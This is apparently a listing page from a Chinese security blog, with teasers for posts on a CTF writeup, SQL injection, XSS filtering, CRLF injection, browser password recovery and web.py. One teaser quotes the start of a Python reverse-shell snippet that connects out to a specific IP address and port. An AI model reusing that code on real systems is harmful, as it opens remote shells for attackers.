包含"--098ytrdvbn"的全部内容
actf-2014-.L-writeup [by 冷夜]-安全小百科

actf-2014-.L-writeup [by 冷夜]

   协会actf2014队伍.L所有writeup,writen by 冷夜     播放地址:http://le4f.net/post/writeup/-ctf-actf-2014-l.-writeup 相关推荐: HappyCTF-writeup这个比赛...
admin的头像-安全小百科admin3年前
0150
python正向连接后门-安全小百科

python正向连接后门

    python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...
admin的头像-安全小百科admin3年前
0140
浅析白盒审计中的字符编码及SQL注入-安全小百科

浅析白盒审计中的字符编码及SQL注入

在freebuf上莫名地被喷,可能是因为被喷让人气上来了,最后得到的金币比前一篇文章更多。塞翁失马,焉知非福? 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统...
admin的头像-安全小百科admin3年前
0130
[ 转载 ] 解开人人网登录密码的 RSA 加密-安全小百科

[ 转载 ] 解开人人网登录密码的 RSA 加密

我很少转载别人的文章的。但这篇确实让我眼前一亮,希望各位看客也能有所收获。 From 91ri : http://www.91ri.org/8928.html 世界上有两种密码:一种是防止你的小妹妹偷看你的文件;另一种是...
admin的头像-安全小百科admin3年前
0300
python 实现 php 的 var_dump 功能-安全小百科

python 实现 php 的 var_dump 功能

    最近在做python的web开发(原谅我的多变,好东西总想都学着。。。node.js也是),不过过程中总遇到些问题,不管是web.py还是django,开发起来确实没用php方便,毕竟存在的时间比...
admin的头像-安全小百科admin3年前
090
360全国大学生信安技术大赛记录-安全小百科

360全国大学生信安技术大赛记录

    大赛进行了两天,大起大落有,丧失信心也有,但最后还是挺过来了。多亏了给力的队友,blink和test,最后拿到了西北赛区的第二名。     简单叙述一下整个过程吧,顺...
admin的头像-安全小百科admin3年前
0150
web.py指南性说明-安全小百科

web.py指南性说明

    整理一下这些天研究web.py的一些经验,写一篇具有划时代意义的指南性说明~哈哈,开个玩笑,谨以此文献给所有学习web.py的同学以及Aaron Swart.     web.py是一个开...
admin的头像-安全小百科admin3年前
0130
如何简单地找回保存在浏览器里的密码-安全小百科

如何简单地找回保存在浏览器里的密码

    一个简单的议题,也是同学们比较常遇到的问题,怎样找回保存在浏览器的“自动填写表单”功能中的密码。最容易想到的当然是抓包。一般的网站数据包里密码就是明文的,不过有些却也...
admin的头像-安全小百科admin3年前
0130
XssHtml – 基于白名单的富文本XSS过滤类-安全小百科

XssHtml – 基于白名单的富文本XSS过滤类

啦啦啦,去了北京参加荣耀6的发布会,真心不错呀这款手机,在这里无耻地推荐一下。与会的同学都获得了一枚荣耀6,说说我的感受吧:CPU真心给力,跑分很高;价格合理,2000是荣耀一贯的高性价比...
admin的头像-安全小百科admin3年前
0130
新浪某站CRLF Injection导致的安全问题-安全小百科

新浪某站CRLF Injection导致的安全问题

CRLF Injection很少遇见,这次被我逮住了。我看zone中(http://zone.wooyun.org/content/13323)还有一些同学对于这个漏洞不甚了解,甚至分不清它与CSRF,我详细说一下吧。 CRLF是”回车 + ...
admin的头像-安全小百科admin3年前
0190